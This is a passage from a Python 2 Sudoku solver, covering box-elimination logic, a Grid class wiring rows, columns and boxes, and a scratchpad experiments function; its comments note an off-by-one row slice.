            2: [0,1],
            5: [0,1],
            8: [0,1]
        }
        self.cell_to_nonrow = {
            0: [1,2],
            1: [1,2],
            2: [1,2],
            3: [0,2],
            4: [0,2],
            5: [0,2],
            6: [0,1],
            7: [0,1],
            8: [0,1]
        }

    def eliminate(self):
        """
        Look for cells that must hold a certain value: if a value is possible
        in exactly one unsolved cell of this box, solve that cell with it.
        """
        for index in range(9):
            # Concrete list so .remove() works on Python 3 as well
            # (range objects have no remove()).
            others = list(range(9))
            others.remove(index)
            for value in range(1, 10):
                # If the cell is not already solved
                if not self.cells[index].solved:
                    # If this cell cannot hold this value, continue to next value
                    if value not in self.cells[index].possible_values:  # fixed: colon was missing
                        continue
                    # If all other cells cannot hold this value, this cell must be it.
                    if all([value not in self.cells[other].possible_values for other in others]):
                        self.cells[index].set_solved(value)
                        break
class Grid(object):
    # The full 9x9 puzzle: 81 cells plus row/column (and, after setuptest,
    # box) views that alias the same Cell objects.
    def __init__(self):
        self.cells = []
        self.rows = []
        self.columns = []
    def setuptest(self):
        # Populate the grid with dummy cells (value == index) and wire up the
        # row/column/box views for experimentation.
        self.cells = [Cell(value=i) for i in range(81)]
        # NOTE(review): the slice (i*9):(i*9)+8 yields only 8 cells per row;
        # a full row needs +9 -- confirm and fix before relying on `rows`.
        self.rows = [Line(cells=self.cells[i*9:(i*9)+8]) for i in range(0,9)]
        self.columns = [
            Line(cells=[self.cells[i] for i in range(0,81,9)]),
            Line(cells=[self.cells[i] for i in range(1,81,9)]),
            Line(cells=[self.cells[i] for i in range(2,81,9)]),
            Line(cells=[self.cells[i] for i in range(3,81,9)]),
            Line(cells=[self.cells[i] for i in range(4,81,9)]),
            Line(cells=[self.cells[i] for i in range(5,81,9)]),
            Line(cells=[self.cells[i] for i in range(6,81,9)]),
            Line(cells=[self.cells[i] for i in range(7,81,9)]),
            Line(cells=[self.cells[i] for i in range(8,81,9)])
        ]
        # Each box is identified by the index of its top-left cell.
        self.boxes = [
            Box(cells=
                [self.cells[i], self.cells[i+1], self.cells[i+2],
                self.cells[i+9], self.cells[i+10], self.cells[i+11],
                self.cells[i+18], self.cells[i+19], self.cells[i+20]]
                ) for i in [0,3,6,27,30,33,54,57,60]
        ]
    def display(self):
        # Print the grid row by row (Python 2 print statement).
        for row in range(9):
            print "|".join(["{0:2}".format(self.cells[(row*9)+i].value) for i in range(9)])
def experiments():
    # Scratchpad used while developing the classes above; the commented block
    # exercised Grid aliasing (cells shared between rows/columns/boxes).
    # grid = Grid()
    # grid.setuptest()
    # print grid.cells[0].value
    # print grid.rows[0].cells[0].value
    # print grid.columns[0].cells[0].value
    # print grid.boxes[0].cells[0].value
    # grid.cells[0].value = 99
    # print grid.cells[0].value
    # print grid.rows[0].cells[0].value
    # print grid.columns[0].cells[0].value
    # print grid.boxes[0].cells[0].value
    # grid.columns[0].cells[0].value = 999
    # print grid.cells[0].value
    # print grid.rows[0].cells[0].value
    # print grid.columns[0].cells[0].value
    # print grid.boxes[0].cells[0].value
    # print grid.cells[42].value
    # print grid.rows[4].cells[6].value
    # print grid.columns[6].cells[4].value
    # print grid.boxes[5].cells[3].value
    # grid.boxes[0].cells[0].value = 0
    # grid.display()
    # Demonstrates iterating over a copy ([:]) while mutating the original
    # list (Python 2 print statement below).
    unsolved_cell_indices = [1,2,3]
    unsolved_values = [4,5,6]
    for index in unsolved_cell_indices:
        for value in unsolved_values[:]:
            print unsolved_values
            if index == 2:
                if 5 in unsolved_values:
                    unsolved_values.remove(5)
experiments() | Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.